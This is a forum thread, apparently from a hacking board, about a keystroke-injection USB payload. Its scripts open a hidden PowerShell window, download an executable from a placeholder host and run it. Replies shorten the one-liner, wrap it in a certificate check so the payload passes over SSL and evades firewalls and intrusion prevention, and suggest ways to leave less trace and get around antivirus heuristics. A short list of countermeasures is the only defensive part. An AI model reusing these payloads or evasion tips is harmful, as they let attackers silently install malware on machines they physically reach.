Jump to content

[Payload] Powershell Download and execute modification


overwraith
 Share

Recommended Posts

Added a total of two words, but now powershell hides the window.

GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER
Link to comment
Share on other sites

  • 3 weeks later...

Every little bit helps, right?

Here are my 2 cents...

powershell -w hidden (new-object 
system.net.webclient).downloadfile('https://xxx.com/1.x','%tmp%\1.exe');saps 
"%tmp%\1.exe"

Thats a tiny bit shorter/faster...

Also if your evil webserver has a valid certificate, then you can use SSL for the shellcode transfer as well. This would let it pass undetected through firewalls and IPS'es that would potentially detect the shellcode in transit. Being trapped by an IPS is usually a game over scenario since you raise all kinds of alarms, so this is something you usually want to avoid.

Having a valid ssl certificate is no problem for legit pentesting. I wouldn't want to sign a hack with my own certificates if I was doing anything illegal though ;-)

Another minor tweak... I don't know if it works, but just pressing the "GUI" key without "R" leaves less of a trace in the run history and may be faster... Haven't tested if it works though, and it may be theoretically a bit more unstable since you are executing based on a "search result". Normally you shouldn't find many matches though ;-)

Also I'd like to point out a few more tweaks and ideas:

1. Verify evil webserver's certificate so that you know that you aren't being tricked into a proxy / man-in-the-middle situation...

$w=[System.Net.WebRequest]::Create('https://xxx.com');$r=$w.GetResponse();if 
($w.ServicePoint.Certificate){$Cert=[System.Security.Cryptography.X509Certificates.X509Certificate2]$w.ServicePoint.Certificate.Handle;$Chain=New-Object 
System.Security.Cryptography.X509Certificates.X509Chain;If(($r.ResponseUri -eq 
'https://xxx.com/')-and($Chain.Build($Cert))){
powershell -w hidden (new-object 
system.net.webclient).downloadfile('https://xxx.com/1.x','%tmp%\1.exe');saps 
"%tmp%\1.exe"}}
 

The whole idea here is that you check the ResponseUri against an expected value so you know you are talking to the right server, and then verify the validity of the cert before you transfer the actual shellcode.The payload is getting quite big though (about 400 characters), so you might not want to use it all the time.

2. Don't know if you have already discussed this on the board, but system wide keyboard hooks don't require admin access to install / run, and they don't need to be big (2-3k should do it I believe). if you want to drop huge amounts of code, you could theoretically drop a system wide keyboard hook on the system first, and have the keyboard send keystrokes through that keyboard filter only. This would let you input commands to any window, and if you filter it correctly, there is no way to intercept / see what's going on. Once the hooks are installed, there are no visible windows that spew out the payload etc.

3. With regards to countermeasures, there are a few options that are effective:

a. Antivirus will detect your shellcode if it has signatures for it.

b. Antivirus heuristics tend to trigger on a single parent process downloading code and then immediately executing. Some heuristic algorithms are actually quite hard to work around.

c. It is possible to detect and block rubber duckies with system wide keyboard hooks. You could for instance filter anything following a CTRL/ALT/WIN keypress against a blacklist, or even profile typing patterns and rate. This is not even hard to do.

Hope this was useful...

Edited by blazingmind
Link to comment
Share on other sites

Nifty stuff, makes me wish I had, and knew how to use a web server.

Concerning the countermeasures,

Shellcode can be obfuscated, heuristic algorithms have to allow some user activity, and system wide keyboard hooks can also be thwarted by using alternate key sequences to execute the same procedure, and possibly custom firmware that allows for human speed data input.

It's all just a continuum of moves and counter moves, just like everything else in war, virology, and attack vectors.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...